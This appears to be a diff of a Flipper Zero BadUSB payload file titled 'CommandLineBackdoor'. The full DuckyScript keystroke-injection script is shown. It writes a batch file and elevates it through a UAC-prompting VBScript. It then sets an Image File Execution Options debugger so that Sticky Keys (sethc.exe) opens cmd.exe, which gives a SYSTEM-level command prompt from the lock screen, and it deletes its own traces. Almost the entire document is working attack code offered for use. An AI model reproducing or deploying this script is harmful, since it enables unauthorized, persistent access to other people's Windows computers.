■ ■ ■ ■ ■ ■
Remote-Access/CommandLineBackdoor/CommandLineBackdoor.txt
1 | | - | REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) |
2 | | - | REM Description: Creates a command prompt "backdoor" that can be launched in almost any "secure" Windows environment, |
3 | | - | REM (Lock Screen for example) via Sticky Keys shortcuts (Pressing shift five times) or the keyboard combination Alt+Shift+PrtScr. |
4 | | - | REM This then results in launching the command prompt in the same account as the current environment, i.e. SYSTEM or your user account. |
5 | | - | REM Version: 1.0 |
6 | | - | REM Category: Remote_Access |
7 | | - | REM plug in second USB in before the Flipper |
8 | | - | DELAY 3000 |
9 | | - | CONTROL ESCAPE |
10 | | - | DELAY 500 |
11 | | - | STRING notepad |
12 | | - | DELAY 250 |
13 | | - | ENTER |
14 | | - | DELAY 750 |
15 | | - | STRING @echo off |
16 | | - | ENTER |
17 | | - | STRING :init |
18 | | - | ENTER |
19 | | - | STRING setlocal DisableDelayedExpansion |
20 | | - | ENTER |
21 | | - | STRING set cmdInvoke=1 |
22 | | - | ENTER |
23 | | - | STRING set winSysFolder=System32 |
24 | | - | ENTER |
25 | | - | STRING set "batchPath=%~0" |
26 | | - | ENTER |
27 | | - | STRING for %%k in (%0) do set batchName=%%~nk |
28 | | - | ENTER |
29 | | - | STRING set "TEMPVBS=%temp%\OEgetPriv_run.vbs" |
30 | | - | ENTER |
31 | | - | STRING setlocal EnableDelayedExpansion |
32 | | - | ENTER |
33 | | - | STRING :checkPrivileges |
34 | | - | ENTER |
35 | | - | STRING NET FILE 1>NUL 2>NUL |
36 | | - | ENTER |
37 | | - | STRING if '%errorlevel%' == '0' (goto gotPrivileges) else (goto getPrivileges) |
38 | | - | ENTER |
39 | | - | STRING :getPrivileges |
40 | | - | ENTER |
41 | | - | STRING if '%1'=='ELEV' (echo ELEV & shift /1 & goto gotPrivileges) |
42 | | - | ENTER |
43 | | - | STRING echo Set UAC = CreateObject^("Shell.Application"^) > "%TEMPVBS%" |
44 | | - | ENTER |
45 | | - | STRING echo args = "ELEV " >> "%TEMPVBS%" |
46 | | - | ENTER |
47 | | - | STRING echo For Each strArg in WScript.Arguments >> "%TEMPVBS%" |
48 | | - | ENTER |
49 | | - | STRING echo args = args ^& strArg ^& " " >> "%TEMPVBS%" |
50 | | - | ENTER |
51 | | - | STRING echo Next>> "%TEMPVBS%" |
52 | | - | ENTER |
53 | | - | STRING if '%cmdInvoke%'=='1' goto InvokeCmd |
54 | | - | ENTER |
55 | | - | STRING echo UAC.ShellExecute "!batchPath!", args, "", "runas", 1 >> "%TEMPVBS%" |
56 | | - | ENTER |
57 | | - | STRING goto ExecElevation |
58 | | - | ENTER |
59 | | - | STRING :InvokeCmd |
60 | | - | ENTER |
61 | | - | STRING echo args = "/c """ + "!batchPath!" + """ " + args >> "%TEMPVBS%" |
62 | | - | ENTER |
63 | | - | STRING echo UAC.ShellExecute "%SystemRoot%\%winSysFolder%\cmd.exe", args, "", "runas", 1 >> "%TEMPVBS%" |
64 | | - | ENTER |
65 | | - | STRING :ExecElevation |
66 | | - | ENTER |
67 | | - | STRING "%SystemRoot%\%winSysFolder%\WScript.exe" "%TEMPVBS%" %* |
68 | | - | ENTER |
69 | | - | STRING exit /B |
70 | | - | ENTER |
71 | | - | STRING :gotPrivileges |
72 | | - | ENTER |
73 | | - | STRING setlocal & cd /d "%~dp0." |
74 | | - | ENTER |
75 | | - | STRING if '%1'=='ELEV' (del "%TEMPVBS%" 1>nul 2>nul & shift /1) |
76 | | - | ENTER |
77 | | - | STRING reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /ve /f && reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "Debugger" /t REG_SZ /d "cmd.exe" /f && cls && echo Payload Installed Successfully && pause && goto end |
78 | | - | ENTER |
79 | | - | STRING cls |
80 | | - | ENTER |
81 | | - | STRING echo Payload Install Failed |
82 | | - | ENTER |
83 | | - | STRING pause |
84 | | - | ENTER |
85 | | - | STRING :end |
86 | | - | ENTER |
87 | | - | STRING del /F /Q "%~0" && exit |
88 | | - | CONTROL s |
89 | | - | DELAY 500 |
90 | | - | STRING %temp%\run.bat |
91 | | - | TAB |
92 | | - | STRING a |
93 | | - | ENTER |
94 | | - | DELAY 250 |
95 | | - | ALT F4 |
96 | | - | DELAY 250 |
97 | | - | CONTROL ESCAPE |
98 | | - | DELAY 500 |
99 | | - | STRING %temp%\run.bat |
100 | | - | ENTER |